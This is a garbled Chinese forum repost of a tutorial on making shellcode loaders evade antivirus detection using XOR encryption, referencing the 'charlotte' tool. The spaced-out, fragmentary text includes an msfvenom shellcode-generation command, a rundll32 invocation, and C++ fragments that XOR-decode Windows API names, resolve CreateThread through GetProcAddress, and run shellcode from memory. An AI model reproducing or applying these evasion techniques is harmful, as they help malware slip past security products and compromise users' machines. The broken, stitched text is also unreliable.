[18975] 2021-07-09_不会免杀?看我异或加密如何做到VT全免杀

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-09_不会免杀?看我异或加密如何做到VT全免杀   V T     I n B u g   I n B u g   2 0 2 1 - 0 7 - 0 9                                                                                                                                                                                                                                             g i t h u b     C     w i n d o w s   a p i     a n t i s c a n . m e 怀     v t  
                                                                                                                                                                                                                                          使 使 p y t h o n 3   C + + V S 2 0 1 7 K a l i   L i n u x 使 a p t - g e t   i n s t a l l   m i n g w - w 6 4 * m s f s h e l l c o d e 便 s h e l l c o d e   p y t h o n   c h a r l o t t e . p y m s f v e n o m   - p   w i n d o w s / e x e c   C M D = c a l c . e x e   E X I T F U N C = t h r e a d   - f   r a w   - o   b e a c o n . b i n
d l l   r u n d l l 3 2   c h a r l o t t e . d l l ,   c h a r l o t t e . p y B y p a s s   A V                                                                                                                                             C + + p y t h o n C + + w i n d o w s   a p i   s h e l l c o d e  
C + + C + + >     >   线 线 >   s h e l l c o d e   使 G e t P r o c A d d r e s s p y s h e l l c o d e a p i k e y         / /   I f   a l l   g o o d ,   l a u n c h   t h e   p a y l o a d         i f   (   r v b a   ! =   0   )   {                                 X O R ( ( c h a r   * )   c r e a t e t h r e a d ,   c t _ l e n ,   c t _ k e y ,   s i z e o f ( c t _ k e y ) ) ;                                 p C r e a t e T h r e a d   =   G e t P r o c A d d r e s s ( G e t M o d u l e H a n d l e ( " k e r n e l 3 2 . d l l " ) ,   c r e a t e t h r e a d ) ;                         t h b a   =   p C r e a t e T h r e a d ( 0 ,   0 ,   ( L P T H R E A D _ S T A R T _ R O U T I N E )   e x e c _ m e m ,   0 ,   0 ,   0 ) ;                                 X O R ( ( c h a r   * )   w a i t f o r s i n g l e o b j e c t ,   w f s o _ l e n ,   w f s o _ k e y ,   s i z e o f ( w f s o _ k e y ) ) ;                         p W a i t F o r S i n g l e O b j e c t   =   G e t P r o c A d d r e s s ( G e t M o d u l e H a n d l e ( " k e r n e l 3 2 . d l l " ) ,   w a i t f o r s i n g l e o b j e c t ) ;                         p W a i t F o r S i n g l e O b j e c t ( t h b a ,   - 1 ) ;         }         r e t u r n   T R U E ;         }
s h e l l c o d e a p i k e y
g + + c p p                                       1 .   V T 使 使 2 .   c h a r   b u f [ ]   =   { ' h ' , ' e ' , ' l ' , ' l ' , ' o ' } ; t e x t r d a t a i d a 3 .   w i n d o w s   a p i 使 a p i k e y g + + v s 2 0 1 7
p y t h o n g + + d l l c p p ~ c + + v s 2 0 1 7 c + +   0 x 0 0
线 h t t p s : / / g i t h u b . c o m / 9 e m i n 1 / c h a r l o t t e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则